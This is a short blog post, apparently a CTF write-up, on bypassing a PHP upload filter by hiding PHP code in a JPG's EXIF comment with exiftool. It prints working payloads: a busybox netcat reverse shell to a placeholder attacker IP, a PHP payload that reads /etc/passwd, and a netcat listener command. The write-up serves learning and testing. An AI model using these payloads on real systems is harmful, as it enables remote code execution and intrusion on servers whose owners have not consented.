Poetical Hacking

Turning a JPG Into a Reverse Shell With Exiftool

Cezar Nicolescu 2025-09-12 2 min read Permalink

Yesterday I played a CTF in order to improve my OSINT skills and I arrived at a stage where I needed a reverse shell. Through OSINT techniques I got access to the source code of the application (written in PHP). The app had an upload feature that I was able to access, the OS behind Ubuntu 20, it seemed easy… But the upload feature had a MIME filter: only JPG, JPEG, PNG, BMP however there was no check on the extension type so, in theory, if I had 4 magic bytes added at the begining of a reverse shell file, my upload would have passed.

Trying a reverse shell file with hexeditor

I created my reverse shell file from bash,

echo "AAAA <?php system('busybox nc [attacking_ip] [listener_port] -e /bin/bash'); ?>' > rev.php

opened it with hexeditor and replaced the first for bytes with FF D8 FF E0 and sent the upload.

The response was prompt: “Only JPG, JPEG, PNG and BMP files are allowed”.

I changed the Content-Type in the upload form into image/jpg and tried again. Same thing…

Polyglot image to the rescue

I decided to try with a polyglot so I created a small jpg image.

convert -size 10x10 xc:white test.jpg

In order to see if it works I did not go after getting my reverse shell but I tested to see if I can get /etc/passwd displayed so I added a payload to do that using the useful Exiftool.

exiftool -Comment="<?php echo 'START ' . file_get_contents('/etc/passwd') . ' END'; ?>" test.jpg -o polyglot.php

I uploaded the file polyglot.php and it was uploaded successfully. I accessed it and /etc/passwd was nicely, or almost nicely, displayed.

Getting my revese shell was already trivial.

I fired up my listener rlwrap nc -nvlp 4444 (I like using rlwrap..) and I modified the payload.

exiftool -Comment="<?php system('busybox nc [attacker_ip] [listener_port] -e /bin/bash'); ?>" test.jpg -o polyglot1.php

After upload and a GET request on the polyglot1.php I was www-data on the the Ubuntu machine.

Becoming root?

The privilege escalation part was not really interesting as the password of one of the users on the machine was discovered via OSINT and it had sudo privileges.

A final note

The magic bytes technique might not work all the time even if everthing gives the impression that it should and the same could be true for the polyglot technique as well. Having them both in my arsenal got me 2 more flags from an, otherwise, pretty easy CTF.

Copyright © 2025 Cezar Nicolescu